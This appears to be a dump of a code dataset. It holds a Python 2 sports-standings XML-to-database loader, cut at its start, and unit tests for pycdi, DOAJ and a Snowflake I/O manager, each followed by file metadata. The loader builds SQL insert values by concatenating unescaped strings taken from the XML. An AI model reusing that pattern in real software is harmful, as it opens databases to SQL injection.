class WCBKHandler(ContentHandler):
def __init__(self):
self.id = 0
self.team_id = 0
self.global_id = 0
self.group = ''
self.type = ''
self.name = ''
self.num = ''
self.num2 = ''
self.num3 = ''
self.num4 = ''
self.season = ''
self.insertdata = []
self.teams = []
self.stands = []
self.isSeason = False
self.isTeam = False
self.isTeamCode = False
def startElement(self, name, attrs):
if name == 'season':
self.isSeason = True
self.season = attrs.get('season')
self.teams = get_teams(c, '129')
elif name == 'wcbk-team-standings':
self.isTeam = True
self.insertdata = []
elif name == 'team-code':
self.global_id = attrs.get('global-id')
self.team_id = int(find_value_in_array2args(self.teams, self.global_id) or 0)
self.stands = get_stands(c, self.team_id, self.season)
elif name == 'wins' or name == 'losses':
self.group = name
self.type = ''
self.num = attrs.get('number')
self.num2 = ''
elif name == 'winning-percentage':
self.group = name
self.type = ''
self.num = attrs.get('percentage')
self.num2 = ''
elif name == 'place':
self.group = name
self.type = ''
self.num = attrs.get('place')
self.num2 = ''
elif name == 'ranking':
self.group = name
self.type = ''
self.num = attrs.get('ranking')
self.num2 = ''
elif name == 'points-for' or name == 'points-against':
self.group = name
self.type = attrs.get('type')
self.num = attrs.get('number')
self.num2 = ''
elif name == 'sos':
self.group = name
self.type = ''
self.num = attrs.get('rank')
self.num2 = attrs.get('sos')
elif name == 'rpi':
self.group = name
self.type = ''
self.num = attrs.get('rank')
self.num2 = attrs.get('rpi')
elif name == 'win-loss-record':
self.group = name
self.type = attrs.get('type')
self.num = attrs.get('wins')
self.num2 = attrs.get('losses')
elif name == 'streak':
self.group = name
self.type = attrs.get('kind')
self.num = attrs.get('games')
self.num2 = ''
return
def endElement(self, name):
if name == 'season':
self.isSeason = False
elif name == 'wcbk-team-standings':
self.isTeam = False
data = str.join(',', self.insertdata)
insert_standings(c, data)
elif name == 'team-code':
self.isTeamCode = False
elif name == 'wins' or name == 'losses' \
or name == 'winning-percentage' \
or name == 'place' \
or name == 'ranking' \
or name == 'points-for' or name == 'points-against' \
or name == 'rpi' or name == 'sos' \
or name == 'win-loss-record' \
or name == 'streak':
if self.team_id > 0:
self.id = int(find_value_in_array4args(self.stands, self.group, self.type, self.name) or 0)
self.insertdata.append("("
+ str(self.id) +
",'"
+ str(self.group) +
"','"
+ str(self.type) +
"','"
+ str(self.name) +
"','"
+ str(self.num) +
"','"
+ str(self.num2) +
"','"
+ str(self.num3) +
"','"
+ str(self.num4) +
"',"
+ str(self.team_id) +
",'"
+ str(self.season) +
"','"
+ str(self.global_id) +
"')")
class NFLHandler(ContentHandler):
def __init__(self):
self.id = 0
self.team_id = 0
self.global_id = 0
self.group = ''
self.type = ''
self.name = ''
self.num = ''
self.num2 = ''
self.num3 = ''
self.num4 = ''
self.season = ''
self.insertdata = []
self.teams = []
self.stands = []
self.isSeason = False
self.isTeam = False
self.isTeamCode = False
def startElement(self, name, attrs):
if name == 'season':
self.isSeason = True
self.season = attrs.get('season')
self.teams = get_teams(c, '3')
elif name == 'football-nfl-team-standings':
self.isTeam = True
self.insertdata = []
elif name == 'team-code':
self.global_id = attrs.get('global-id')
self.team_id = int(find_value_in_array2args(self.teams, self.global_id) or 0)
self.stands = get_stands(c, self.team_id, self.season)
elif name in ['wins', 'losses', 'ties', 'points-for', 'points-against', 'games-back', 'wc-games-back']:
self.group = name
self.type = ''
self.name = ''
self.num = attrs.get('number')
self.num2 = ''
self.num3 = ''
self.num4 = ''
elif name == 'winning-percentage':
self.group = name
self.type = ''
self.name = ''
self.num = attrs.get('percentage')
self.num2 = ''
self.num3 = ''
self.num4 = ''
elif name == 'place':
self.group = name
self.type = ''
self.name = ''
self.num = attrs.get('place')
self.num2 = ''
self.num3 = ''
self.num4 = ''
elif name == 'win-loss-record':
self.group = name
self.type = attrs.get('type')
self.name = attrs.get('name')
self.num = attrs.get('wins')
self.num2 = attrs.get('losses')
self.num3 = attrs.get('ties')
self.num4 = ''
elif name == 'streak':
self.group = name
self.type = attrs.get('kind')
self.name = ''
self.num = attrs.get('games')
self.num2 = ''
self.num3 = ''
self.num4 = ''
elif name == 'eliminated-from-playoffs':
self.group = name
self.type = ''
self.name = ''
self.num = attrs.get('eliminated')
self.num2 = ''
self.num3 = ''
self.num4 = ''
return
def endElement(self, name):
if name == 'season':
self.isSeason = False
elif name == 'football-nfl-team-standings':
self.isTeam = False
data = str.join(',', self.insertdata)
insert_standings(c, data)
elif name == 'team-code':
self.isTeamCode = False
elif name in ['wins', 'losses', 'ties', 'points-for', 'points-against', 'games-back', 'wc-games-back',
'winning-percentage', 'place', 'win-loss-record', 'streak', 'eliminated-from-playoffs']:
if self.team_id > 0:
self.id = int(find_value_in_array4args(self.stands, self.group, self.type, self.name) or 0)
self.insertdata.append("("
+ str(self.id) +
",'"
+ str(self.group) +
"','"
+ str(self.type) +
"','"
+ str(self.name) +
"','"
+ str(self.num) +
"','"
+ str(self.num2) +
"','"
+ str(self.num3) +
"','"
+ str(self.num4) +
"',"
+ str(self.team_id) +
",'"
+ str(self.season) +
"','"
+ str(self.global_id) +
"')")
class CFBHandler(ContentHandler):
def __init__(self):
self.id = 0
self.team_id = 0
self.global_id = 0
self.group = ''
self.type = ''
self.name = ''
self.num = ''
self.num2 = ''
self.num3 = ''
self.num4 = ''
self.season = ''
self.insertdata = []
self.teams = []
self.stands = []
self.isSeason = False
self.isTeam = False
self.isTeamCode = False
def startElement(self, name, attrs):
if name == 'season':
self.isSeason = True
self.season = attrs.get('season')
self.teams = get_teams(c, '130')
elif name == 'cfb-team-standings':
self.isTeam = True
self.insertdata = []
elif name == 'team-code':
self.global_id = attrs.get('global-id')
self.team_id = int(find_value_in_array2args(self.teams, self.global_id) or 0)
self.stands = get_stands(c, self.team_id, self.season)
elif name in ['wins', 'losses']:
self.group = name
self.type = ''
self.num = attrs.get('number')
self.num2 = ''
self.num3 = ''
self.num4 = ''
elif name == 'winning-percentage':
self.group = name
self.type = ''
self.num = attrs.get('percentage')
self.num2 = ''
self.num3 = ''
self.num4 = ''
elif name == 'ranking':
self.group = name
self.type = ''
self.num = attrs.get('ranking')
self.num2 = ''
self.num3 = ''
self.num4 = ''
elif name == 'place':
self.group = name
self.type = ''
self.num = attrs.get('place')
self.num2 = ''
self.num3 = ''
self.num4 = ''
elif name == 'points-for' or name == 'points-against':
self.group = name
self.type = attrs.get('type')
self.num = attrs.get('number')
self.num2 = ''
self.num3 = ''
self.num4 = ''
elif name == 'win-loss-record':
self.group = name
self.type = attrs.get('type')
self.num = attrs.get('wins')
self.num2 = attrs.get('losses')
self.num3 = attrs.get('percentage')
self.num4 = ''
elif name == 'streak':
self.group = name
self.type = attrs.get('kind')
self.num = attrs.get('games')
self.num2 = ''
self.num3 = ''
self.num4 = ''
return
def endElement(self, name):
if name == 'season':
self.isSeason = False
elif name == 'cfb-team-standings':
self.isTeam = False
data = str.join(',', self.insertdata)
insert_standings(c, data)
elif name == 'team-code':
self.isTeamCode = False
elif name in ['wins', 'losses', 'winning-percentage', 'place', 'ranking', 'points-for', 'points-against',
'win-loss-record'
, 'streak']:
if self.team_id > 0:
self.id = int(find_value_in_array4args(self.stands, self.group, self.type, self.name) or 0)
self.insertdata.append("("
+ str(self.id) +
",'"
+ str(self.group) +
"','"
+ str(self.type) +
"','"
+ str(self.name) +
"','"
+ str(self.num) +
"','"
+ str(self.num2) +
"','"
+ str(self.num3) +
"','"
+ str(self.num4) +
"',"
+ str(self.team_id) +
",'"
+ str(self.season) +
"','"
+ str(self.global_id) +
"')")
class MLBHandler(ContentHandler):
def __init__(self):
self.id = 0
self.team_id = 0
self.global_id = 0
self.group = ''
self.type = ''
self.name = ''
self.num = ''
self.num2 = ''
self.num3 = ''
self.num4 = ''
self.season = ''
self.insertdata = []
self.teams = []
self.stands = []
self.isSeason = False
self.isTeam = False
self.isTeamCode = False
def startElement(self, name, attrs):
if name == 'season':
self.isSeason = True
self.season = attrs.get('season')
self.teams = get_teams(c, '5')
elif name == 'baseball-mlb-team-standings':
self.isTeam = True
self.insertdata = []
elif name == 'team-code':
self.global_id = attrs.get('global-id')
self.team_id = int(find_value_in_array2args(self.teams, self.global_id) or 0)
self.stands = get_stands(c, self.team_id, self.season)
elif name in ['wins', 'losses', 'games-back', 'wc-games-back']:
self.group = name
self.type = ''
self.name = ''
self.num = attrs.get('number')
self.num2 = ''
elif name == 'winning-percentage':
self.group = name
self.type = ''
self.name = ''
self.num = attrs.get('percentage')
self.num2 = ''
elif name == 'division-rank':
self.group = name
self.type = 'rank'
self.name = ''
self.num = attrs.get('rank')
self.num2 = ''
elif name == 'win-loss-record':
self.group = name
self.type = attrs.get('type')
self.name = attrs.get('name')
self.num = attrs.get('wins')
self.num2 = attrs.get('losses')
elif name == 'streak':
self.group = name
self.type = attrs.get('kind')
self.name = ''
self.num = attrs.get('games')
self.num2 = ''
elif name == 'eliminated-from-playoffs':
self.group = name
self.type = ''
self.name = ''
self.num = attrs.get('eliminated')
self.num2 = ''
return
def endElement(self, name):
if name == 'season':
self.isSeason = False
elif name == 'baseball-mlb-team-standings':
self.isTeam = False
data = str.join(',', self.insertdata)
insert_standings(c, data)
elif name == 'team-code':
self.isTeamCode = False
elif name in ['wins', 'losses', 'games-back', 'wc-games-back', 'winning-percentage', 'division-rank',
'win-loss-record', 'streak', 'eliminated-from-playoffs']:
if self.team_id > 0:
self.id = int(find_value_in_array4args(self.stands, self.group, self.type, self.name) or 0)
self.insertdata.append("("
+ str(self.id) +
",'"
+ str(self.group) +
"','"
+ str(self.type) +
"','"
+ str(self.name) +
"','"
+ str(self.num) +
"','"
+ str(self.num2) +
"','"
+ str(self.num3) +
"','"
+ str(self.num4) +
"',"
+ str(self.team_id) +
",'"
+ str(self.season) +
"','"
+ str(self.global_id) +
"')")
class NHLHandler(ContentHandler):
def __init__(self):
self.id = 0
self.team_id = 0
self.global_id = 0
self.group = ''
self.type = ''
self.name = ''
self.num = ''
self.num2 = ''
self.num3 = ''
self.num4 = ''
self.season = ''
self.insertdata = []
self.teams = []
self.stands = []
self.isSeason = False
self.isTeam = False
self.isTeamCode = False
def startElement(self, name, attrs):
if name == 'season':
self.isSeason = True
self.season = attrs.get('season')
self.teams = get_teams(c, '4')
elif name == 'hockey-nhl-team-standings':
self.isTeam = True
self.insertdata = []
elif name == 'team-code':
self.global_id = attrs.get('global-id')
self.team_id = int(find_value_in_array2args(self.teams, self.global_id) or 0)
self.stands = get_stands(c, self.team_id, self.season)
elif name in ['wins', 'losses', 'ties', 'overtime-losses', 'shootout-losses', 'team-points']:
self.group = name
self.type = ''
self.name = ''
self.num = attrs.get('number')
self.num2 = ''
self.num3 = ''
self.num4 = ''
elif name == 'winning-percentage':
self.group = name
self.type = ''
self.name = ''
self.num = attrs.get('percentage')
self.num2 = ''
self.num3 = ''
self.num4 = ''
elif name == 'place':
self.group = name
self.type = ''
self.name = ''
self.num = attrs.get('place')
self.num2 = ''
self.num3 = ''
self.num4 = ''
elif name == 'win-loss-record':
self.group = name
self.type = attrs.get('type')
self.name = attrs.get('name')
self.num = attrs.get('wins')
self.num2 = attrs.get('losses')
self.num3 = attrs.get('overtime-losses')
self.num4 = attrs.get('shootout-losses')
elif name == 'streak':
self.group = name
self.type = attrs.get('kind')
self.name = ''
self.num = attrs.get('games')
self.num2 = ''
self.num3 = ''
self.num4 = ''
elif name in ['goals-for', 'goals-against']:
self.group = name
self.type = ''
self.name = ''
self.num = attrs.get('goals')
self.num2 = ''
self.num3 = ''
self.num4 = ''
return
def endElement(self, name):
if name == 'season':
self.isSeason = False
elif name == 'hockey-nhl-team-standings':
self.isTeam = False
data = str.join(',', self.insertdata)
insert_standings(c, data)
elif name == 'team-code':
self.isTeamCode = False
elif name in ['wins', 'losses', 'ties', 'overtime-losses', 'shootout-losses', 'team-points',
'winning-percentage', 'place', 'win-loss-record', 'streak', 'goals-for', 'goals-against']:
if self.team_id > 0:
self.id = int(find_value_in_array4args(self.stands, self.group, self.type, self.name) or 0)
self.insertdata.append("("
+ str(self.id) +
",'"
+ str(self.group) +
"','"
+ str(self.type) +
"','"
+ str(self.name) +
"','"
+ str(self.num) +
"','"
+ str(self.num2) +
"','"
+ str(self.num3) +
"','"
+ str(self.num4) +
"',"
+ str(self.team_id) +
",'"
+ str(self.season) +
"','"
+ str(self.global_id) +
"')")
class MLSHandler(ContentHandler):
def __init__(self):
self.id = 0
self.team_id = 0
self.global_id = 0
self.group = ''
self.type = ''
self.name = ''
self.num = ''
self.num2 = ''
self.num3 = ''
self.num4 = ''
self.season = ''
self.league = ''
self.insertdata = []
self.teams = []
self.stands = []
self.isSeason = False
self.isTeam = False
self.isTeamCode = False
def startElement(self, name, attrs):
if name == 'league':
self.league = attrs.get('alias')
elif name == 'season':
self.isSeason = True
self.season = attrs.get('year')
for live in schedule_files:
if live[2] == self.league.lower():
self.teams = get_teams(c, str(live[0]))
elif name == 'ifb-team-standings':
self.isTeam = True
self.insertdata = []
elif name == 'team-info':
self.global_id = attrs.get('global-id')
self.team_id = int(find_value_in_array2args(self.teams, self.global_id) or 0)
self.stands = get_stands(c, self.team_id, self.season)
elif name in ['wins', 'losses', 'ties']:
self.group = name
self.type = ''
self.name = ''
self.num = attrs.get('number')
self.num2 = ''
self.num3 = ''
self.num4 = ''
elif name == 'winning-percentage':
self.group = name
self.type = ''
self.name = ''
self.num = attrs.get('percentage')
self.num2 = ''
self.num3 = ''
self.num4 = ''
elif name == 'place':
self.group = name
self.type = ''
self.name = ''
self.num = attrs.get('place')
self.num2 = ''
self.num3 = ''
self.num4 = ''
elif name == 'games-played':
self.group = name
self.type = ''
self.name = ''
self.num = attrs.get('games')
self.num2 = ''
self.num3 = ''
self.num4 = ''
elif name == 'points':
self.group = name
self.type = 'points'
self.name = ''
self.num = attrs.get('points')
self.num2 = attrs.get('points-per-game')
self.num3 = attrs.get('penalty-points')
self.num4 = ''
elif name == 'win-loss-record':
self.group = name
self.type = attrs.get('type')
self.name = attrs.get('name')
self.num = attrs.get('wins')
self.num2 = attrs.get('losses')
self.num3 = attrs.get('goals')
self.num4 = attrs.get('goals-against')
elif name == 'streak':
self.group = name
self.type = attrs.get('kind')
self.name = ''
self.num = attrs.get('games')
self.num2 = ''
self.num3 = ''
self.num4 = ''
elif name in ['goals-for', 'goals-against']:
self.group = name
self.type = ''
self.name = ''
self.num = attrs.get('goals')
self.num2 = ''
self.num3 = ''
self.num4 = ''
return
def endElement(self, name):
if name == 'season':
self.isSeason = False
elif name == 'ifb-team-standings':
self.isTeam = False
data = str.join(',', self.insertdata)
insert_standings(c, data)
elif name == 'team-info':
self.isTeamCode = False
elif name in ['wins', 'losses', 'ties', 'points', 'winning-percentage', 'place', 'win-loss-record', 'streak',
'goals-for', 'goals-against', 'games-played']:
if self.team_id > 0:
self.id = int(find_value_in_array4args(self.stands, self.group, self.type, self.name) or 0)
self.insertdata.append("("
+ str(self.id) +
",'"
+ str(self.group) +
"','"
+ str(self.type) +
"','"
+ str(self.name) +
"','"
+ str(self.num) +
"','"
+ str(self.num2) +
"','"
+ str(self.num3) +
"','"
+ str(self.num4) +
"',"
+ str(self.team_id) +
",'"
+ str(self.season) +
"','"
+ str(self.global_id) +
"')")
if __name__ == "__main__":
if os.access(os.path.expanduser("~/.lockfile.standing.lock"), os.F_OK):
# if the lockfile is already there then check the PID number
# in the lock file
pidfile = open(os.path.expanduser("~/.lockfile.standing.lock"), "r")
pidfile.seek(0)
old_pid = pidfile.readline()
# Now we check the PID from lock file matches to the current
# process PID
if os.path.exists("/proc/%s" % old_pid):
print "You already have an instance of the program running"
print "It is running as process %s," % old_pid
sys.exit(1)
else:
print "File is there but the program is not running"
print "Removing lock file for the: %s as it can be there because of the program last time it was run" % old_pid
os.remove(os.path.expanduser("~/.lockfile.standing.lock"))
else:
pidfile = open(os.path.expanduser("~/.lockfile.standing.lock"), "w")
pidfile.write("%s" % os.getpid())
pidfile.close
try:
cc = db_open()
c = cc[0]
conn = cc[1]
parser = make_parser()
curHandler = NBAHandler()
parser.setContentHandler(curHandler)
parser.parse(open(path + "NBA_TEAM_STANDINGS.XML"))
curHandler = WNBAHandler()
parser.setContentHandler(curHandler)
parser.parse(open(path + "WNBA_TEAM_STANDINGS.XML"))
curHandler = CBKHandler()
parser.setContentHandler(curHandler)
parser.parse(open(path + "CBK_TEAM_STANDINGS.XML"))
curHandler = WCBKHandler()
parser.setContentHandler(curHandler)
parser.parse(open(path + "WCBK_TEAM_STANDINGS.XML"))
curHandler = MLBHandler()
parser.setContentHandler(curHandler)
parser.parse(open(path + "MLB_TEAM_STANDINGS.XML"))
curHandler = NFLHandler()
parser.setContentHandler(curHandler)
parser.parse(open(path + "NFL_TEAM_STANDINGS.XML"))
curHandler = CFBHandler()
parser.setContentHandler(curHandler)
parser.parse(open(path + "CFB_TEAM_STANDINGS.XML"))
curHandler = NHLHandler()
parser.setContentHandler(curHandler)
parser.parse(open(path + "NHL_TEAM_STANDINGS.XML"))
curHandler = MLSHandler()
parser.setContentHandler(curHandler)
parser.parse(open(path + "BUND_TEAM_STANDINGS.XML"))
curHandler = MLSHandler()
parser.setContentHandler(curHandler)
parser.parse(open(path + "FRAN_TEAM_STANDINGS.XML"))
curHandler = MLSHandler()
parser.setContentHandler(curHandler)
parser.parse(open(path + "EPL_TEAM_STANDINGS.XML"))
curHandler = MLSHandler()
parser.setContentHandler(curHandler)
parser.parse(open(path + "CHLG_TEAM_STANDINGS.XML"))
curHandler = MLSHandler()
parser.setContentHandler(curHandler)
parser.parse(open(path + "FMF_TEAM_STANDINGS.XML"))
curHandler = MLSHandler()
parser.setContentHandler(curHandler)
parser.parse(open(path + "SERI_TEAM_STANDINGS.XML"))
curHandler = MLSHandler()
parser.setContentHandler(curHandler)
parser.parse(open(path + "LIGA_TEAM_STANDINGS.XML"))
curHandler = MLSHandler()
parser.setContentHandler(curHandler)
parser.parse(open(path + "MLS_TEAM_STANDINGS.XML"))
db_close(c, conn)
os.remove(os.path.expanduser("~/.lockfile.standing.lock"))
except:
if debug:
print traceback.format_exc()
else:
send_mail("standings", traceback.format_exc())
os.remove(os.path.expanduser("~/.lockfile.standing.lock"))
sys.exit(1)
| 37.674817
| 139
| 0.407749
| 4,139
| 46,227
| 4.489007
| 0.053395
| 0.057266
| 0.047578
| 0.062217
| 0.906889
| 0.90436
| 0.900431
| 0.868622
| 0.85183
| 0.848708
| 0
| 0.01116
| 0.466957
| 46,227
| 1,226
| 140
| 37.705546
| 0.742868
| 0.00411
| 0
| 0.901213
| 0
| 0.000867
| 0.099976
| 0.021442
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.006932
| null | null | 0.005199
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
f9c95e79e1411a0e94aacd9b43d54d7f84345662
| 2,309
|
py
|
Python
|
tests/common/test_inheritance.py
|
cesartalves/python-cdi
|
a5a13b5e0ad6a5255e686ecd934d4606a9c2a1f2
|
[
"BSD-3-Clause"
] | 10
|
2017-02-02T19:23:12.000Z
|
2020-11-18T05:37:10.000Z
|
tests/common/test_inheritance.py
|
cesartalves/python-cdi
|
a5a13b5e0ad6a5255e686ecd934d4606a9c2a1f2
|
[
"BSD-3-Clause"
] | 34
|
2017-07-29T21:03:20.000Z
|
2021-07-01T13:35:31.000Z
|
tests/common/test_inheritance.py
|
cesartalves/python-cdi
|
a5a13b5e0ad6a5255e686ecd934d4606a9c2a1f2
|
[
"BSD-3-Clause"
] | 1
|
2019-06-05T14:45:36.000Z
|
2019-06-05T14:45:36.000Z
|
# -*- encoding: utf-8 -*-
from tests import TestCase
from pycdi import Inject
from pycdi.core import DEFAULT_CONTAINER
class InheritanceTest(TestCase):
def test_inheritance(self):
test_case = self
DEFAULT_CONTAINER.register_instance('inheritance', str)
DEFAULT_CONTAINER.register_instance({}, dict)
DEFAULT_CONTAINER.register_instance([], list)
@Inject(str, some_object=object)
class A(object):
def __init__(self, some_str, some_object):
test_case.assertIsInstance(some_str, str)
test_case.assertIsInstance(some_object, object)
@Inject(some_object=object, some_dict=dict)
class B(A):
def __init__(self, some_str, some_object, some_dict):
test_case.assertIsInstance(some_str, str)
test_case.assertIsInstance(some_object, object)
test_case.assertIsInstance(some_dict, dict)
@Inject(some_object=object, some_list=list)
class C(A):
def __init__(self, some_str, some_object, some_list):
test_case.assertIsInstance(some_str, str)
test_case.assertIsInstance(some_object, object)
test_case.assertIsInstance(some_list, list)
DEFAULT_CONTAINER.call(A)
DEFAULT_CONTAINER.call(B)
DEFAULT_CONTAINER.call(C)
def test_inheritance_with_override(self):
test_case = self
DEFAULT_CONTAINER.register_instance('inheritance', str)
DEFAULT_CONTAINER.register_instance({}, dict)
DEFAULT_CONTAINER.register_instance([], list)
@Inject(str, some_object=object)
class A(object):
def __init__(self, some_str, some_object):
test_case.assertIsInstance(some_str, str)
test_case.assertIsInstance(some_object, object)
@Inject(some_dict=dict, _override=True)
class B(A):
def __init__(self, some_dict):
test_case.assertIsInstance(some_dict, dict)
@Inject(some_list=list, _override=True)
class C(A):
def __init__(self, some_list):
test_case.assertIsInstance(some_list, list)
DEFAULT_CONTAINER.call(A)
DEFAULT_CONTAINER.call(B)
DEFAULT_CONTAINER.call(C)
| 35.523077
| 65
| 0.646167
| 260
| 2,309
| 5.373077
| 0.134615
| 0.080172
| 0.206156
| 0.240515
| 0.840372
| 0.817466
| 0.806013
| 0.765927
| 0.720115
| 0.67287
| 0
| 0.000589
| 0.26505
| 2,309
| 64
| 66
| 36.078125
| 0.822628
| 0.009961
| 0
| 0.72
| 0
| 0
| 0.009632
| 0
| 0
| 0
| 0
| 0
| 0.24
| 1
| 0.16
| false
| 0
| 0.06
| 0
| 0.36
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
f9db2572f22c2a2616ce6f149546ef25f86dc4f8
| 4,655
|
py
|
Python
|
doajtest/unit/test_withdraw_reinstate.py
|
glauberm/doaj
|
dc24dfcbf4a9f02ce5c9b09b611a5766ea5742f7
|
[
"Apache-2.0"
] | 47
|
2015-04-24T13:13:39.000Z
|
2022-03-06T03:22:42.000Z
|
doajtest/unit/test_withdraw_reinstate.py
|
glauberm/doaj
|
dc24dfcbf4a9f02ce5c9b09b611a5766ea5742f7
|
[
"Apache-2.0"
] | 1,215
|
2015-01-02T14:29:38.000Z
|
2022-03-28T14:19:13.000Z
|
doajtest/unit/test_withdraw_reinstate.py
|
glauberm/doaj
|
dc24dfcbf4a9f02ce5c9b09b611a5766ea5742f7
|
[
"Apache-2.0"
] | 14
|
2015-11-27T13:01:23.000Z
|
2021-05-21T07:57:23.000Z
|
from doajtest.helpers import DoajTestCase
from doajtest.fixtures import JournalFixtureFactory, ArticleFixtureFactory
from portality import models
from portality.tasks.journal_in_out_doaj import SetInDOAJBackgroundTask, change_in_doaj
import time
class TestWithdrawReinstate(DoajTestCase):
def setUp(self):
super(TestWithdrawReinstate, self).setUp()
def tearDown(self):
super(TestWithdrawReinstate, self).tearDown()
def test_01_withdraw_task(self):
sources = JournalFixtureFactory.make_many_journal_sources(10, in_doaj=True)
ids = []
articles = []
for source in sources:
j = models.Journal(**source)
j.save()
ids.append(j.id)
pissn = j.bibjson().get_identifiers(j.bibjson().P_ISSN)
eissn = j.bibjson().get_identifiers(j.bibjson().E_ISSN)
asource = ArticleFixtureFactory.make_article_source(pissn=pissn[0], eissn=eissn[0], with_id=False)
a = models.Article(**asource)
a.save()
articles.append(a.id)
time.sleep(2)
job = SetInDOAJBackgroundTask.prepare("testuser", journal_ids=ids, in_doaj=False)
SetInDOAJBackgroundTask.submit(job)
time.sleep(2)
for id in ids:
j = models.Journal.pull(id)
assert j.is_in_doaj() is False
for id in articles:
a = models.Article.pull(id)
assert a.is_in_doaj() is False
def test_02_reinstate_task(self):
sources = JournalFixtureFactory.make_many_journal_sources(10, in_doaj=False)
ids = []
articles = []
for source in sources:
j = models.Journal(**source)
j.save()
ids.append(j.id)
pissn = j.bibjson().get_identifiers(j.bibjson().P_ISSN)
eissn = j.bibjson().get_identifiers(j.bibjson().E_ISSN)
asource = ArticleFixtureFactory.make_article_source(pissn=pissn[0], eissn=eissn[0], with_id=False, in_doaj=False)
a = models.Article(**asource)
a.save()
articles.append(a.id)
time.sleep(2)
job = SetInDOAJBackgroundTask.prepare("testuser", journal_ids=ids, in_doaj=True)
SetInDOAJBackgroundTask.submit(job)
time.sleep(2)
for id in ids:
j = models.Journal.pull(id)
assert j.is_in_doaj() is True
for id in articles:
a = models.Article.pull(id)
assert a.is_in_doaj() is True
def test_03_withdraw(self):
acc = models.Account()
acc.set_name("testuser")
ctx = self._make_and_push_test_context(acc=acc)
sources = JournalFixtureFactory.make_many_journal_sources(10, in_doaj=True)
ids = []
articles = []
for source in sources:
j = models.Journal(**source)
j.save()
ids.append(j.id)
pissn = j.bibjson().get_identifiers(j.bibjson().P_ISSN)
eissn = j.bibjson().get_identifiers(j.bibjson().E_ISSN)
asource = ArticleFixtureFactory.make_article_source(pissn=pissn[0], eissn=eissn[0], with_id=False)
a = models.Article(**asource)
a.save()
articles.append(a.id)
time.sleep(2)
change_in_doaj(ids, False)
time.sleep(2)
for id in ids:
j = models.Journal.pull(id)
assert j.is_in_doaj() is False
for id in articles:
a = models.Article.pull(id)
assert a.is_in_doaj() is False
ctx.pop()
def test_04_reinstate(self):
acc = models.Account()
acc.set_name("testuser")
ctx = self._make_and_push_test_context(acc=acc)
sources = JournalFixtureFactory.make_many_journal_sources(10, in_doaj=False)
ids = []
articles = []
for source in sources:
j = models.Journal(**source)
j.save()
ids.append(j.id)
pissn = j.bibjson().get_identifiers(j.bibjson().P_ISSN)
eissn = j.bibjson().get_identifiers(j.bibjson().E_ISSN)
asource = ArticleFixtureFactory.make_article_source(pissn=pissn[0], eissn=eissn[0], with_id=False, in_doaj=False)
a = models.Article(**asource)
a.save()
articles.append(a.id)
time.sleep(2)
change_in_doaj(ids, True)
time.sleep(2)
for id in ids:
j = models.Journal.pull(id)
assert j.is_in_doaj() is True
for id in articles:
a = models.Article.pull(id)
assert a.is_in_doaj() is True
ctx.pop()
| 31.241611
| 125
| 0.596778
| 570
| 4,655
| 4.703509
| 0.136842
| 0.042521
| 0.041775
| 0.065647
| 0.831033
| 0.831033
| 0.831033
| 0.831033
| 0.831033
| 0.831033
| 0
| 0.009759
| 0.295596
| 4,655
| 149
| 126
| 31.241611
| 0.807868
| 0
| 0
| 0.839286
| 0
| 0
| 0.006873
| 0
| 0
| 0
| 0
| 0
| 0.071429
| 1
| 0.053571
| false
| 0
| 0.044643
| 0
| 0.107143
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
f9e8c7fea3e48b73ddba2f59ee4da0ef22f39117
| 2,211
|
py
|
Python
|
python_modules/libraries/dagster-snowflake/dagster_snowflake_tests/test_snowflake_io_manager.py
|
asamoal/dagster
|
08fad28e4b608608ce090ce2e8a52c2cf9dd1b64
|
[
"Apache-2.0"
] | null | null | null |
python_modules/libraries/dagster-snowflake/dagster_snowflake_tests/test_snowflake_io_manager.py
|
asamoal/dagster
|
08fad28e4b608608ce090ce2e8a52c2cf9dd1b64
|
[
"Apache-2.0"
] | null | null | null |
python_modules/libraries/dagster-snowflake/dagster_snowflake_tests/test_snowflake_io_manager.py
|
asamoal/dagster
|
08fad28e4b608608ce090ce2e8a52c2cf9dd1b64
|
[
"Apache-2.0"
] | null | null | null |
from datetime import datetime
from dagster_snowflake.db_io_manager import TablePartition, TableSlice
from dagster_snowflake.snowflake_io_manager import SnowflakeDbClient, _get_cleanup_statement
def test_get_select_statement():
assert (
SnowflakeDbClient.get_select_statement(
TableSlice(database="database_abc", schema="schema1", table="table1")
)
== "SELECT * FROM database_abc.schema1.table1"
)
def test_get_select_statement_columns():
assert (
SnowflakeDbClient.get_select_statement(
TableSlice(
database="database_abc",
schema="schema1",
table="table1",
columns=["apple", "banana"],
)
)
== "SELECT apple, banana FROM database_abc.schema1.table1"
)
def test_get_select_statement_partitioned():
assert SnowflakeDbClient.get_select_statement(
TableSlice(
database="database_abc",
schema="schema1",
table="table1",
partition=TablePartition(
time_window=(datetime(2020, 1, 2), datetime(2020, 2, 3)),
partition_expr="my_timestamp_col",
),
columns=["apple", "banana"],
)
) == (
"SELECT apple, banana FROM database_abc.schema1.table1\n"
"WHERE my_timestamp_col BETWEEN '2020-01-02 00:00:00' AND '2020-02-03 00:00:00'"
)
def test_get_cleanup_statement():
assert (
_get_cleanup_statement(
TableSlice(database="database_abc", schema="schema1", table="table1")
)
== "DELETE FROM database_abc.schema1.table1"
)
def test_get_cleanup_statement_partitioned():
assert _get_cleanup_statement(
TableSlice(
database="database_abc",
schema="schema1",
table="table1",
partition=TablePartition(
time_window=(datetime(2020, 1, 2), datetime(2020, 2, 3)),
partition_expr="my_timestamp_col",
),
)
) == (
"DELETE FROM database_abc.schema1.table1\n"
"WHERE my_timestamp_col BETWEEN '2020-01-02 00:00:00' AND '2020-02-03 00:00:00'"
)
